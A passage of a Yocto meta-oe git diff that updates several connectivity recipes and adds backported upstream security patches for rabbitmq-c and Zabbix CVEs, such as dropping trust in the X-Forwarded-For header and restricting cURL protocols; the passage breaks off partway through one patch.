b/meta-oe/recipes-connectivity/libwebsockets/libwebsockets_4.2.2.bb index 2a3a4ebd06..24b9e9a071 100644 --- a/meta-oe/recipes-connectivity/libwebsockets/libwebsockets_4.2.2.bb +++ b/meta-oe/recipes-connectivity/libwebsockets/libwebsockets_4.2.2.bb @@ -4,6 +4,7 @@ LICENSE = "MIT & Zlib & BSD-3-Clause & Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE;md5=c8bea43a2eb5d713c338819a0be07797" DEPENDS = "zlib" +DEPENDS:append:class-native = " libcap-native" S = "${WORKDIR}/git" SRCREV = "8d605f0649ed1ab6d27a443c7688598ea21fdb75" @@ -44,3 +45,5 @@ RDEPENDS:${PN}-dev += " ${@bb.utils.contains('PACKAGECONFIG', 'static', '${PN}-s # Avoid absolute paths to end up in the sysroot. SSTATE_SCAN_FILES += "*.cmake" + +BBCLASSEXTEND = "native" diff --git a/meta-oe/recipes-connectivity/linuxptp/linuxptp/0001-makefile-use-conditional-assignment-for-KBUILD_OUTPU.patch b/meta-oe/recipes-connectivity/linuxptp/linuxptp/0001-makefile-use-conditional-assignment-for-KBUILD_OUTPU.patch new file mode 100644 index 0000000000..83bdae858f --- /dev/null +++ b/meta-oe/recipes-connectivity/linuxptp/linuxptp/0001-makefile-use-conditional-assignment-for-KBUILD_OUTPU.patch @@ -0,0 +1,42 @@ +From dfd38cb29c0768692f886d3ab9158bd2b3132582 Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Tue, 22 Nov 2022 15:20:48 +0800 +Subject: [PATCH] makefile: use conditional assignment for KBUILD_OUTPUT + +Refer [1],from make 4.4, all variables that are marked as export will +also be passed to the shell started by the shell function. use "=" will +make KBUILD_OUTPUT always empty for shell function, use "?=" to make +"export KBUILD_OUTPUT" in enrironment can work. + +[snip of 4.4 NEWS] +* WARNING: Backward-incompatibility! + Previously makefile variables marked as export were not exported to commands + started by the $(shell ...) function. Now, all exported variables are + exported to $(shell ...). +[snip] + +[1] https://git.savannah.gnu.org/cgit/make.git/tree/NEWS?h=4.4&id=ed493f6c9116cc217b99c2cfa6a95f15803235a2#n74 + +Upstream-Status: Backport [d3dd51ba611802d7cbb28631cb943cb882fa4aac] + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + makefile | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/makefile b/makefile +index 529d8a0..3db60fa 100644 +--- a/makefile ++++ b/makefile +@@ -15,7 +15,7 @@ + # with this program; if not, write to the Free Software Foundation, Inc., + # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +-KBUILD_OUTPUT = ++KBUILD_OUTPUT ?= + + DEBUG = + CC ?= $(CROSS_COMPILE)gcc +-- +2.25.1 + diff --git a/meta-oe/recipes-connectivity/linuxptp/linuxptp_3.1.1.bb b/meta-oe/recipes-connectivity/linuxptp/linuxptp_3.1.1.bb index 9c0f56e736..9c8e649b1a 100644 --- a/meta-oe/recipes-connectivity/linuxptp/linuxptp_3.1.1.bb +++ b/meta-oe/recipes-connectivity/linuxptp/linuxptp_3.1.1.bb @@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" SRC_URI = "http://sourceforge.net/projects/linuxptp/files/v3.1/linuxptp-${PV}.tgz \ file://build-Allow-CC-and-prefix-to-be-overriden.patch \ file://Use-cross-cpp-in-incdefs.patch \ + file://0001-makefile-use-conditional-assignment-for-KBUILD_OUTPU.patch \ " UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/linuxptp/files/" diff --git a/meta-oe/recipes-connectivity/rabbitmq-c/files/CVE-2023-35789.patch b/meta-oe/recipes-connectivity/rabbitmq-c/files/CVE-2023-35789.patch new file mode 100644 index 0000000000..93949fc21d --- /dev/null +++ b/meta-oe/recipes-connectivity/rabbitmq-c/files/CVE-2023-35789.patch @@ -0,0 +1,135 @@ +From 463054383fbeef889b409a7f843df5365288e2a0 Mon Sep 17 00:00:00 2001 +From: Christian Kastner <ckk@kvr.at> +Date: Tue, 13 Jun 2023 14:21:52 +0200 +Subject: [PATCH] Add option to read username/password from file (#781) + +* Add option to read username/password from file + +CVE: CVE-2023-35789 + +Upstream-Status: Backport [https://github.com/alanxz/rabbitmq-c/commit/463054383fbeef889b409a7f843df5365288e2a0] + +Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com> +--- + tools/common.c | 66 ++++++++++++++++++++++++++++++++++++++++++++++++++ + 1 file changed, 66 insertions(+) + +diff --git a/tools/common.c b/tools/common.c +index 53ea788..35b2b9f 100644 +--- a/tools/common.c ++++ b/tools/common.c +@@ -54,6 +54,11 @@ + #include "compat.h" + #endif + ++/* For when reading auth data from a file */ ++#define MAXAUTHTOKENLEN 128 ++#define USERNAMEPREFIX "username:" ++#define PASSWORDPREFIX "password:" ++ + void die(const char *fmt, ...) { + va_list ap; + va_start(ap, fmt); +@@ -161,6 +166,7 @@ static char *amqp_vhost; + static char *amqp_username; + static char *amqp_password; + static int amqp_heartbeat = 0; ++static char *amqp_authfile; + #ifdef WITH_SSL + static int amqp_ssl = 0; + static char *amqp_cacert = "/etc/ssl/certs/cacert.pem"; +@@ -183,6 +189,8 @@ struct poptOption connect_options[] = { + "the password to login with", "password"}, + {"heartbeat", 0, POPT_ARG_INT, &amqp_heartbeat, 0, + "heartbeat interval, set to 0 to disable", "heartbeat"}, ++ {"authfile", 0, POPT_ARG_STRING, &amqp_authfile, 0, ++ "path to file containing username/password for authentication", "file"}, + #ifdef WITH_SSL + {"ssl", 0, POPT_ARG_NONE, &amqp_ssl, 0, "connect over SSL/TLS", NULL}, + {"cacert", 0, POPT_ARG_STRING, &amqp_cacert, 0, +@@ -194,6 +202,50 @@ struct poptOption connect_options[] = { + #endif /* WITH_SSL */ + {NULL, '\0', 0, NULL, 0, NULL, NULL}}; + ++void read_authfile(const char *path) { ++ size_t n; ++ FILE *fp = NULL; ++ char token[MAXAUTHTOKENLEN]; ++ ++ if ((amqp_username = malloc(MAXAUTHTOKENLEN)) == NULL || ++ (amqp_password = malloc(MAXAUTHTOKENLEN)) == NULL) { ++ die("Out of memory"); ++ } else if ((fp = fopen(path, "r")) == NULL) { ++ die("Could not read auth data file %s", path); ++ } ++ ++ if (fgets(token, MAXAUTHTOKENLEN, fp) == NULL || ++ strncmp(token, USERNAMEPREFIX, strlen(USERNAMEPREFIX))) { ++ die("Malformed auth file (missing username)"); ++ } ++ strncpy(amqp_username, &token[strlen(USERNAMEPREFIX)], MAXAUTHTOKENLEN); ++ /* Missing newline means token was cut off */ ++ n = strlen(amqp_username); ++ if (amqp_username[n - 1] != '\n') { ++ die("Username too long"); ++ } else { ++ amqp_username[n - 1] = '\0'; ++ } ++ ++ if (fgets(token, MAXAUTHTOKENLEN, fp) == NULL || ++ strncmp(token, PASSWORDPREFIX, strlen(PASSWORDPREFIX))) { ++ die("Malformed auth file (missing password)"); ++ } ++ strncpy(amqp_password, &token[strlen(PASSWORDPREFIX)], MAXAUTHTOKENLEN); ++ /* Missing newline means token was cut off */ ++ n = strlen(amqp_password); ++ if (amqp_password[n - 1] != '\n') { ++ die("Password too long"); ++ } else { ++ amqp_password[n - 1] = '\0'; ++ } ++ ++ (void)fgetc(fp); ++ if (!feof(fp)) { ++ die("Malformed auth file (trailing data)"); ++ } ++} ++ + static void init_connection_info(struct amqp_connection_info *ci) { + ci->user = NULL; + ci->password = NULL; +@@ -269,6 +321,8 @@ static void init_connection_info(struct amqp_connection_info *ci) { + if (amqp_username) { + if (amqp_url) { + die("--username and --url options cannot be used at the same time"); ++ } else if (amqp_authfile) { ++ die("--username and --authfile options cannot be used at the same time"); + } + + ci->user = amqp_username; +@@ -277,11 +331,23 @@ static void init_connection_info(struct amqp_connection_info *ci) { + if (amqp_password) { + if (amqp_url) { + die("--password and --url options cannot be used at the same time"); ++ } else if (amqp_authfile) { ++ die("--password and --authfile options cannot be used at the same time"); + } + + ci->password = amqp_password; + } + ++ if (amqp_authfile) { ++ if (amqp_url) { ++ die("--authfile and --url options cannot be used at the same time"); ++ } ++ ++ read_authfile(amqp_authfile); ++ ci->user = amqp_username; ++ ci->password = amqp_password; ++ } ++ + if (amqp_vhost) { + if (amqp_url) { + die("--vhost and --url options cannot be used at the same time"); +-- +2.40.0 diff --git a/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.11.0.bb b/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.11.0.bb index 304171c88c..1cc4ada3b5 100644 --- a/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.11.0.bb +++ b/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.11.0.bb @@ -3,7 +3,9 @@ HOMEPAGE = "https://github.com/alanxz/rabbitmq-c" LIC_FILES_CHKSUM = "file://LICENSE-MIT;md5=6b7424f9db80cfb11fdd5c980b583f53" LICENSE = "MIT" -SRC_URI = "git://github.com/alanxz/rabbitmq-c.git;branch=master;protocol=https" +SRC_URI = "git://github.com/alanxz/rabbitmq-c.git;branch=master;protocol=https \ + file://CVE-2023-35789.patch \ + " # v0.11.0-master SRCREV = "a64c08c68aff34d49a2ac152f04988cd921084f9" diff --git a/meta-oe/recipes-connectivity/ser2net/ser2net_4.3.5.bb b/meta-oe/recipes-connectivity/ser2net/ser2net_4.3.5.bb index 79d54038eb..a33265063c 100644 --- a/meta-oe/recipes-connectivity/ser2net/ser2net_4.3.5.bb +++ b/meta-oe/recipes-connectivity/ser2net/ser2net_4.3.5.bb @@ -14,5 +14,3 @@ SRC_URI[sha256sum] = "848c4fe863806e506832f1ee85b8b68258f06eb19dad43dbeee16a2cfe UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/ser2net/files/ser2net" inherit autotools pkgconfig - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-43515.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-43515.patch new file mode 100644 index 0000000000..6028520923 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-43515.patch @@ -0,0 +1,37 @@ +From 6b5dfdb31aa503bb0358784c632ff3a04e7a8ff4 Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Wed, 4 Jan 2023 13:51:03 +0800 +Subject: [PATCH] [DEV-2301] fixed spoofing X-Forwarded-For request header + allows to access Frontend in maintenace mode + +Upstream-Status: Backport [https://git.zabbix.com/projects/ZBX/repos/zabbix/commits/50668e9d64af32cdc67a45082c556699ff86565e] +CVE: CVE-2022-43515 + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + ui/include/classes/user/CWebUser.php | 6 ++---- + 1 file changed, 2 insertions(+), 4 deletions(-) + +diff --git a/ui/include/classes/user/CWebUser.php b/ui/include/classes/user/CWebUser.php +index e6e651e..bfacce7 100644 +--- a/ui/include/classes/user/CWebUser.php ++++ b/ui/include/classes/user/CWebUser.php +@@ -231,13 +231,11 @@ class CWebUser { + } + + /** +- * Get user ip address. ++ * Get user IP address. + * + * @return string + */ + public static function getIp(): string { +- return (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER) && $_SERVER['HTTP_X_FORWARDED_FOR'] !== '') +- ? $_SERVER['HTTP_X_FORWARDED_FOR'] +- : $_SERVER['REMOTE_ADDR']; ++ return $_SERVER['REMOTE_ADDR']; + } + } +-- +2.25.1 + diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-46768.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-46768.patch new file mode 100644 index 0000000000..debd0aaa8e --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-46768.patch @@ -0,0 +1,53 @@ +From 7373f92c80eb89941428468cd6b9d5c8879a7f93 Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Wed, 4 Jan 2023 14:23:34 +0800 +Subject: [PATCH] [DEV-2283] added validation of the scheduled report + generation URL to zabbix-web-service + +Upstream-Status: Backport [https://git.zabbix.com/projects/ZBX/repos/zabbix/commits/fdb03971867] +CVE: CVE-2022-46768 + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + .../zabbix_web_service/pdf_report_creator.go | 18 ++++++++++++++++++ + 1 file changed, 18 insertions(+) + +diff --git a/src/go/cmd/zabbix_web_service/pdf_report_creator.go b/src/go/cmd/zabbix_web_service/pdf_report_creator.go +index 391b58b..8452a3d 100644 +--- a/src/go/cmd/zabbix_web_service/pdf_report_creator.go ++++ b/src/go/cmd/zabbix_web_service/pdf_report_creator.go +@@ -29,6 +29,7 @@ import ( + "net/http" + "net/url" + "strconv" ++ "strings" + "time" + + "github.com/chromedp/cdproto/emulation" +@@ -123,6 +124,23 @@ func (h *handler) report(w http.ResponseWriter, r *http.Request) { + return + } + ++ if u.Scheme != "http" && u.Scheme != "https" { ++ logAndWriteError(w, fmt.Sprintf("Unexpected URL scheme: \"%s\"", u.Scheme), http.StatusBadRequest) ++ return ++ } ++ ++ if !strings.HasSuffix(u.Path, "/zabbix.php") { ++ logAndWriteError(w, fmt.Sprintf("Unexpected URL path: \"%s\"", u.Path), http.StatusBadRequest) ++ return ++ } ++ ++ queryParams := u.Query() ++ ++ if queryParams.Get("action") != "dashboard.print" { ++ logAndWriteError(w, fmt.Sprintf("Unexpected URL action: \"%s\"", queryParams.Get("action")), http.StatusBadRequest) ++ return ++ } ++ + log.Tracef( + "making chrome headless request with parameters url: %s, width: %s, height: %s for report request from %s", + u.String(), req.Parameters["width"], req.Parameters["height"], r.RemoteAddr) +-- +2.25.1 + diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29449.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29449.patch new file mode 100644 index 0000000000..675d9e0f35 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29449.patch @@ -0,0 +1,247 @@ +From 240754ccee1b6b35ac47862be56dacec11e65b32 Mon Sep 17 00:00:00 2001 +From: Dmitrijs Goloscapovs <dmitrijs.goloscapovs@zabbix.com> +Date: Thu, 27 Jul 2023 11:23:54 +0000 +Subject: [PATCH] .......PS. [DEV-2387] added new limits for JS objects + +Merge in ZBX/zabbix from feature/DEV-2387-6.0 to release/6.0 + +* commit '16e5f15a70cfbf00c646cb92d1fcb8a362900285': + .......PS. [DEV-2387] removed logsize check based on json buffer + .......PS. [DEV-2387] removed logsize check based on json buffer + .......PS. [DEV-2387] fixed pr comments + .......PS. [DEV-2387] removed useless include + .......PS. [DEV-2387] added limits for logging and adding httprequest headers + .......PS. [DEV-2387] limited initialization of new HttpRequest objects + +CVE: CVE-2023-29449 + +Upstream-Status: Backport [https://git.zabbix.com/projects/ZBX/repos/zabbix/commits/240754ccee1] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/libs/zbxembed/console.c | 23 ++++++++++++----------- + src/libs/zbxembed/embed.c | 1 + + src/libs/zbxembed/embed.h | 3 +++ + src/libs/zbxembed/httprequest.c | 28 ++++++++++++++++++++++++++++ + src/libs/zbxembed/zabbix.c | 23 ++++++++++++----------- + 5 files changed, 56 insertions(+), 22 deletions(-) + +diff --git a/src/libs/zbxembed/console.c b/src/libs/zbxembed/console.c +index c733487..60c48fc 100644 +--- a/src/libs/zbxembed/console.c ++++ b/src/libs/zbxembed/console.c +@@ -90,27 +90,28 @@ static duk_ret_t es_log_message(duk_context *ctx, int level) + else + msg_output = zbx_strdup(msg_output, "undefined"); + +- zabbix_log(level, "%s", msg_output); +- + duk_get_memory_functions(ctx, &out_funcs); + env = (zbx_es_env_t *)out_funcs.udata; + +- if (NULL == env->json) +- goto out; +- +- if (ZBX_ES_LOG_MEMORY_LIMIT < env->json->buffer_size) /* approximate limit */ ++ if (ZBX_ES_LOG_MEMORY_LIMIT < env->log_size) + { + err_index = duk_push_error_object(ctx, DUK_RET_EVAL_ERROR, "log exceeds the maximum size of " + ZBX_FS_UI64 " bytes.", ZBX_ES_LOG_MEMORY_LIMIT); + goto out; + } + +- zbx_json_addobject(env->json, NULL); +- zbx_json_adduint64(env->json, "level", (zbx_uint64_t)level); +- zbx_json_adduint64(env->json, "ms", zbx_get_duration_ms(&env->start_time)); +- zbx_json_addstring(env->json, "message", msg_output, ZBX_JSON_TYPE_STRING); +- zbx_json_close(env->json); ++ zabbix_log(level, "%s", msg_output); ++ ++ if (NULL != env->json) ++ { ++ zbx_json_addobject(env->json, NULL); ++ zbx_json_adduint64(env->json, "level", (zbx_uint64_t)level); ++ zbx_json_adduint64(env->json, "ms", zbx_get_duration_ms(&env->start_time)); ++ zbx_json_addstring(env->json, "message", msg_output, ZBX_JSON_TYPE_STRING); ++ zbx_json_close(env->json); ++ } + out: ++ env->log_size += strlen(msg_output); + zbx_free(msg_output); + + if (-1 != err_index) +diff --git a/src/libs/zbxembed/embed.c b/src/libs/zbxembed/embed.c +index 34d8d18..cc80925 100644 +--- a/src/libs/zbxembed/embed.c ++++ b/src/libs/zbxembed/embed.c +@@ -444,6 +444,7 @@ int zbx_es_execute(zbx_es_t *es, const char *script, const char *code, int size, + zabbix_log(LOG_LEVEL_DEBUG, "In %s() param:%s", __func__, param); + + zbx_timespec(&es->env->start_time); ++ es->env->http_req_objects = 0; + + if (NULL != es->env->json) + { +diff --git a/src/libs/zbxembed/embed.h b/src/libs/zbxembed/embed.h +index a0a360c..2b954a8 100644 +--- a/src/libs/zbxembed/embed.h ++++ b/src/libs/zbxembed/embed.h +@@ -48,6 +48,9 @@ struct zbx_es_env + struct zbx_json *json; + + jmp_buf loc; ++ ++ int http_req_objects; ++ size_t log_size; + }; + + zbx_es_env_t *zbx_es_get_env(duk_context *ctx); +diff --git a/src/libs/zbxembed/httprequest.c b/src/libs/zbxembed/httprequest.c +index 8c2839c..7f0eed9 100644 +--- a/src/libs/zbxembed/httprequest.c ++++ b/src/libs/zbxembed/httprequest.c +@@ -52,6 +52,7 @@ typedef struct + size_t headers_in_alloc; + size_t headers_in_offset; + unsigned char custom_header; ++ size_t headers_sz; + } + zbx_es_httprequest_t; + +@@ -145,13 +146,21 @@ static duk_ret_t es_httprequest_dtor(duk_context *ctx) + ******************************************************************************/ + static duk_ret_t es_httprequest_ctor(duk_context *ctx) + { ++#define MAX_HTTPREQUEST_OBJECT_COUNT 10 + zbx_es_httprequest_t *request; + CURLcode err; ++ zbx_es_env_t *env; + int err_index = -1; + + if (!duk_is_constructor_call(ctx)) + return DUK_RET_TYPE_ERROR; + ++ if (NULL == (env = zbx_es_get_env(ctx))) ++ return duk_error(ctx, DUK_RET_TYPE_ERROR, "cannot access internal environment"); ++ ++ if (MAX_HTTPREQUEST_OBJECT_COUNT == env->http_req_objects) ++ return duk_error(ctx, DUK_RET_EVAL_ERROR, "maximum count of HttpRequest objects was reached"); ++ + duk_push_this(ctx); + + request = (zbx_es_httprequest_t *)zbx_malloc(NULL, sizeof(zbx_es_httprequest_t)); +@@ -189,7 +198,10 @@ out: + return duk_throw(ctx); + } + ++ env->http_req_objects++; ++ + return 0; ++#undef MAX_HTTPREQUEST_OBJECT_COUNT + } + + /****************************************************************************** +@@ -201,10 +213,12 @@ out: + ******************************************************************************/ + static duk_ret_t es_httprequest_add_header(duk_context *ctx) + { ++#define ZBX_ES_MAX_HEADERS_SIZE ZBX_KIBIBYTE * 128 + zbx_es_httprequest_t *request; + CURLcode err; + char *utf8 = NULL; + int err_index = -1; ++ size_t header_sz; + + if (NULL == (request = es_httprequest(ctx))) + return duk_error(ctx, DUK_RET_EVAL_ERROR, "internal scripting error: null object"); +@@ -215,9 +229,20 @@ static duk_ret_t es_httprequest_add_header(duk_context *ctx) + goto out; + } + ++ header_sz = strlen(utf8); ++ ++ if (ZBX_ES_MAX_HEADERS_SIZE < request->headers_sz + header_sz) ++ { ++ err_index = duk_push_error_object(ctx, DUK_RET_TYPE_ERROR, "headers exceeded maximum size of " ++ ZBX_FS_UI64 " bytes.", ZBX_ES_MAX_HEADERS_SIZE); ++ ++ goto out; ++ } ++ + request->headers = curl_slist_append(request->headers, utf8); + ZBX_CURL_SETOPT(ctx, request->handle, CURLOPT_HTTPHEADER, request->headers, err); + request->custom_header = 1; ++ request->headers_sz += header_sz + 1; + out: + zbx_free(utf8); + +@@ -225,6 +250,7 @@ out: + return duk_throw(ctx); + + return 0; ++#undef ZBX_ES_MAX_HEADERS_SIZE + } + + /****************************************************************************** +@@ -244,6 +270,7 @@ static duk_ret_t es_httprequest_clear_header(duk_context *ctx) + curl_slist_free_all(request->headers); + request->headers = NULL; + request->custom_header = 0; ++ request->headers_sz = 0; + + return 0; + } +@@ -311,6 +338,7 @@ static duk_ret_t es_httprequest_query(duk_context *ctx, const char *http_request + { + curl_slist_free_all(request->headers); + request->headers = NULL; ++ request->headers_sz = 0; + } + + if (NULL != contents) +diff --git a/src/libs/zbxembed/zabbix.c b/src/libs/zbxembed/zabbix.c +index 820768f..0ecde86 100644 +--- a/src/libs/zbxembed/zabbix.c ++++ b/src/libs/zbxembed/zabbix.c +@@ -81,27 +81,28 @@ static duk_ret_t es_zabbix_log(duk_context *ctx) + zbx_replace_invalid_utf8(message); + } + +- zabbix_log(level, "%s", message); +- + duk_get_memory_functions(ctx, &out_funcs); + env = (zbx_es_env_t *)out_funcs.udata; + +- if (NULL == env->json) +- goto out; +- +- if (ZBX_ES_LOG_MEMORY_LIMIT < env->json->buffer_size) /* approximate limit */ ++ if (ZBX_ES_LOG_MEMORY_LIMIT < env->log_size) + { + err_index = duk_push_error_object(ctx, DUK_RET_EVAL_ERROR, "log exceeds the maximum size of " + ZBX_FS_UI64 " bytes.", ZBX_ES_LOG_MEMORY_LIMIT); + goto out; + } + +- zbx_json_addobject(env->json, NULL); +- zbx_json_adduint64(env->json, "level", (zbx_uint64_t)level); +- zbx_json_adduint64(env->json, "ms", zbx_get_duration_ms(&env->start_time)); +- zbx_json_addstring(env->json, "message", message, ZBX_JSON_TYPE_STRING); +- zbx_json_close(env->json); ++ zabbix_log(level, "%s", message); ++ ++ if (NULL != env->json) ++ { ++ zbx_json_addobject(env->json, NULL); ++ zbx_json_adduint64(env->json, "level", (zbx_uint64_t)level); ++ zbx_json_adduint64(env->json, "ms", zbx_get_duration_ms(&env->start_time)); ++ zbx_json_addstring(env->json, "message", message, ZBX_JSON_TYPE_STRING); ++ zbx_json_close(env->json); ++ } + out: ++ env->log_size += strlen(message); + zbx_free(message); + + if (-1 != err_index) +-- +2.35.5 diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29450.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29450.patch new file mode 100644 index 0000000000..ea790f0a93 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29450.patch @@ -0,0 +1,241 @@ +From 76f6a80cb3d6131e9c3e98918305c1bf1805fa2a Mon Sep 17 00:00:00 2001 +From: Vladislavs Sokurenko <vladislavs.sokurenko@zabbix.com> +Date: Thu, 27 Jul 2023 12:43:02 +0000 +Subject: [PATCH] ...G...PS. [DEV-2429] fixed unauthorised file system access + when using cURL + +Merge in ZBX/zabbix from feature/DEV-2429-6.0 to release/6.0 + +* commit 'abf345230ee185d61cc0bd70d432fa4b093b8a53': + ...G...PS. [DEV-2429] fixed unautorized file system access when using curl + .......PS. [DEV-2429] fixed unautorized file system access in JS preprocessing + +CVE: CVE-2023-29450 + +Upstream-Status: Backport [https://git.zabbix.com/projects/ZBX/repos/zabbix/commits/76f6a80cb3d] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/libs/zbxembed/httprequest.c | 4 +++ + src/libs/zbxhistory/history_elastic.c | 30 ++++++++++++++++++++++ + src/libs/zbxhttp/http.c | 9 +++++++ + src/libs/zbxmedia/email.c | 6 +++++ + src/libs/zbxsysinfo/common/http.c | 9 +++++++ + src/libs/zbxsysinfo/simple/simple.c | 11 ++++++++ + src/zabbix_server/httppoller/httptest.c | 9 +++++++ + src/zabbix_server/reporter/report_writer.c | 10 ++++++++ + src/zabbix_server/vmware/vmware.c | 9 +++++++ + 9 files changed, 97 insertions(+) + +diff --git a/src/libs/zbxembed/httprequest.c b/src/libs/zbxembed/httprequest.c +index 7f0eed9..871b925 100644 +--- a/src/libs/zbxembed/httprequest.c ++++ b/src/libs/zbxembed/httprequest.c +@@ -354,6 +354,10 @@ static duk_ret_t es_httprequest_query(duk_context *ctx, const char *http_request + ZBX_CURL_SETOPT(ctx, request->handle, CURLOPT_CUSTOMREQUEST, http_request, err); + ZBX_CURL_SETOPT(ctx, request->handle, CURLOPT_TIMEOUT_MS, timeout_ms - elapsed_ms, err); + ZBX_CURL_SETOPT(ctx, request->handle, CURLOPT_POSTFIELDS, ZBX_NULL2EMPTY_STR(contents), err); ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ ZBX_CURL_SETOPT(ctx, request->handle, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS, err); ++#endif + + request->data_offset = 0; + request->headers_in_offset = 0; +diff --git a/src/libs/zbxhistory/history_elastic.c b/src/libs/zbxhistory/history_elastic.c +index 8b3ea84..fc881da 100644 +--- a/src/libs/zbxhistory/history_elastic.c ++++ b/src/libs/zbxhistory/history_elastic.c +@@ -406,6 +406,16 @@ static void elastic_writer_add_iface(zbx_history_iface_t *hist) + goto out; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(data->handle, opt = CURLOPT_PROTOCOLS, ++ CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ zabbix_log(LOG_LEVEL_ERR, "cannot set cURL option %d: [%s]", (int)opt, curl_easy_strerror(err)); ++ goto out; ++ } ++#endif ++ + *page_w[hist->value_type].errbuf = '\0'; + + if (CURLE_OK != (err = curl_easy_setopt(data->handle, opt = CURLOPT_PRIVATE, &page_w[hist->value_type]))) +@@ -722,6 +732,16 @@ static int elastic_get_values(zbx_history_iface_t *hist, zbx_uint64_t itemid, in + goto out; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(data->handle, opt = CURLOPT_PROTOCOLS, ++ CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ zabbix_log(LOG_LEVEL_ERR, "cannot set cURL option %d: [%s]", (int)opt, curl_easy_strerror(err)); ++ goto out; ++ } ++#endif ++ + zabbix_log(LOG_LEVEL_DEBUG, "sending query to %s; post data: %s", data->post_url, query.buffer); + + page_r.offset = 0; +@@ -1065,6 +1085,16 @@ void zbx_elastic_version_extract(struct zbx_json *json) + goto clean; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(handle, opt = CURLOPT_PROTOCOLS, ++ CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ zabbix_log(LOG_LEVEL_WARNING, "cannot set cURL option %d: [%s]", (int)opt, curl_easy_strerror(err)); ++ goto clean; ++ } ++#endif ++ + *errbuf = '\0'; + + if (CURLE_OK != (err = curl_easy_perform(handle))) +diff --git a/src/libs/zbxhttp/http.c b/src/libs/zbxhttp/http.c +index c10922c..36774cc 100644 +--- a/src/libs/zbxhttp/http.c ++++ b/src/libs/zbxhttp/http.c +@@ -333,6 +333,15 @@ int zbx_http_get(const char *url, const char *header, long timeout, char **out, + goto clean; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ *error = zbx_dsprintf(NULL, "Cannot set allowed protocols: %s", curl_easy_strerror(err)); ++ goto clean; ++ } ++#endif ++ + if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_URL, url))) + { + *error = zbx_dsprintf(NULL, "Cannot specify URL: %s", curl_easy_strerror(err)); +diff --git a/src/libs/zbxmedia/email.c b/src/libs/zbxmedia/email.c +index 3b987d9..d3af744 100644 +--- a/src/libs/zbxmedia/email.c ++++ b/src/libs/zbxmedia/email.c +@@ -661,6 +661,12 @@ static int send_email_curl(const char *smtp_server, unsigned short smtp_port, co + if ('\0' != *smtp_helo) + zbx_snprintf(url + url_offset, sizeof(url) - url_offset, "/%s", smtp_helo); + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_PROTOCOLS, CURLPROTO_SMTPS | CURLPROTO_SMTP))) ++ goto error; ++#endif ++ + if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_URL, url))) + goto error; + +diff --git a/src/libs/zbxsysinfo/common/http.c b/src/libs/zbxsysinfo/common/http.c +index acd77e1..8dc4793 100644 +--- a/src/libs/zbxsysinfo/common/http.c ++++ b/src/libs/zbxsysinfo/common/http.c +@@ -176,6 +176,15 @@ static int curl_page_get(char *url, char **buffer, char **error) + goto out; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 